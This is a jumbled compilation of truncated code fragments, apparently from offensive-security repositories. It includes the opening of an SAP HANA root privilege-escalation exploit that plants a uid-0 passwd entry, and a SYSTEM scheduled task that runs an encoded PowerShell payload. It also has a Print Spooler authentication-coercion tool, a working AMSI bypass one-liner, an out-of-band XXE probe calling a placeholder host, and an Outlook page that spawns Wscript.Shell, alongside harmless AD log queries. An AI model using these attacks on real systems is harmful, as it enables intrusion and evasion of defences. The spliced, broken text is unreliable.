import sys, hexdump, binascii
from Crypto.Cipher import AES
class AESCipher:
    """Minimal AES-CBC decryption wrapper around PyCryptodome's ``AES``.

    The key is held as raw bytes; ``AES.new`` rejects anything other than a
    16/24/32-byte key, so a bad key only surfaces on the first ``decrypt``.
    """

    def __init__(self, key):
        # Raw key material, used unchanged for every decrypt call.
        self.key = key

    def decrypt(self, iv, data):
        """Decrypt ``data`` with AES-CBC under ``self.key`` and ``iv``.

        Returns the raw block-aligned plaintext: padding is NOT stripped and
        nothing authenticates the ciphertext (plain CBC is malleable), so the
        caller must verify integrity by other means before trusting the
        output. A fresh cipher object is built per call and kept on
        ``self.cipher`` for the caller's inspection.
        """
        cipher = AES.new(self.key, AES.MODE_CBC, iv)
        self.cipher = cipher
        return cipher.decrypt(data)
S3cur3Th1sSh1t / CVE-2019-0357 - SAP-HANA root
CVE-2019-0357 - SAP-HANA root privesc vuln
import os
import signal
import sys
# Upper bound on how many times the exploit loop is tried before giving up
# (presumably a race window; the loop itself is outside this excerpt).
ATTEMPTS = 100000

# Target binary and the IPC socket it talks over (HXE / HDB90 are the default
# SAP HANA Express SID and instance number - adjust for other installs).
bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher"
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher"

# passwd(5)-formatted line for a uid 0 / gid 0 account. The 'x' password
# field defers to /etc/shadow, so how this account is actually used for
# login depends on code outside this excerpt.
passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash"
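# Find DC list from Active Directory
$DCs = Get-ADDomainController -Filter *
# Define time for report (default is 1 day)
$startDate = (Get-Date).AddDays(-1)
# Collect successful logon events (4624) from every DC's Security log since
# $startDate into ONE array. Assigning inside the loop body (as before) left
# $slogonevents holding only the last DC's events.
$slogonevents = @(
    foreach ($DC in $DCs) {
        # Get-EventLog pulls the whole log over RPC and filters client-side;
        # on busy DCs Get-WinEvent -FilterHashtable @{LogName='Security';Id=4624;StartTime=$startDate}
        # is far cheaper, but returns a different record type, so it is not
        # swapped in here.
        Get-EventLog -LogName Security -ComputerName $DC.Hostname -After $startDate |
            Where-Object { $_.EventID -eq 4624 }
    }
)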
# Look-back window in days for the event search.
$Days = 1
$since = (Get-Date).AddDays(-$Days)
# Accumulated into an array so further Get-WinEvent results can be appended.
$events = @()
# Security 4800/4801 (workstation lock/unlock audit events); the hashtable
# filter is applied server-side, which keeps this cheap on large logs.
$events += Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4800, 4801; StartTime = $since }
$events += Get-WinEvent -FilterHashtable @{
LogName='System'
Id=@(7000,7001)
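# Every computer object in the domain; DNSHostName is what later code targets.
$computers = Get-ADComputer -Filter *
# Look-back window for the logon search (default 1 day).
$startDate = (Get-Date).AddDays(-1)
Write-Host "Please enter the username to search for logon events:"
$username = Read-Host
# Build the target list with ONE entry per computer. The original appended
# $computers.DNSHostName (the entire list) on every iteration, yielding N
# copies of every hostname and N^2 remote queries downstream. The explicit
# @() initialisation matters: without it the first += on $null produces a
# string and later hostnames get concatenated into it.
$Computernames = @()
foreach ($computer in $computers)
{
    $Computernames += $computer.DNSHostName
}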
foreach ($System in $Computernames){
$confirmpreference = "none"
function Get-ScheduledTaskSystem
{
$Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})
$SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount
$action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc 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
S3cur3Th1sSh1t / dementor.py
Python implementation of the MS-RPRN (Print Spooler, "SpoolSample"/printer bug) authentication-coercion technique, built on impacket's native MS-RPRN support
#!/usr/bin/env python
# originally by 3xocyte, modified by agsolino after native MS-RPRN functionality was added to impacket
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
# AMSI bypass: uses reflection to set the private static
# System.Management.Automation.AmsiUtils.amsiInitFailed field to $true, so the
# host believes AMSI initialisation failed (the field name implies later scan
# calls are then short-circuited). This exact one-liner is widely signatured;
# the 'amsiInitFailed' / 'AmsiUtils' strings alone trigger most AV/EDR.
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
--------------------------------------------------------------
Vanilla out-of-band probe: use it to confirm that the parser resolves external entities (outbound / blind XXE) by watching for the HTTP request on your own listener - replace x.x.x.x:443 with a host and port you control.
--------------------------------------------------------------
<?xml version="1.0" ?>
<!-- Out-of-band XXE probe: a parser that resolves external entities fetches
     the URL below (point it at a listener you control; the scheme is plain
     http even though the port is 443). The inbound request is the evidence,
     so this works even when nothing from the document is reflected back. -->
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
Sub window_onload()
Set Application = ViewCtl1.OutlookApplication
Set cmd = Application.CreateObject("Wscript.Shell")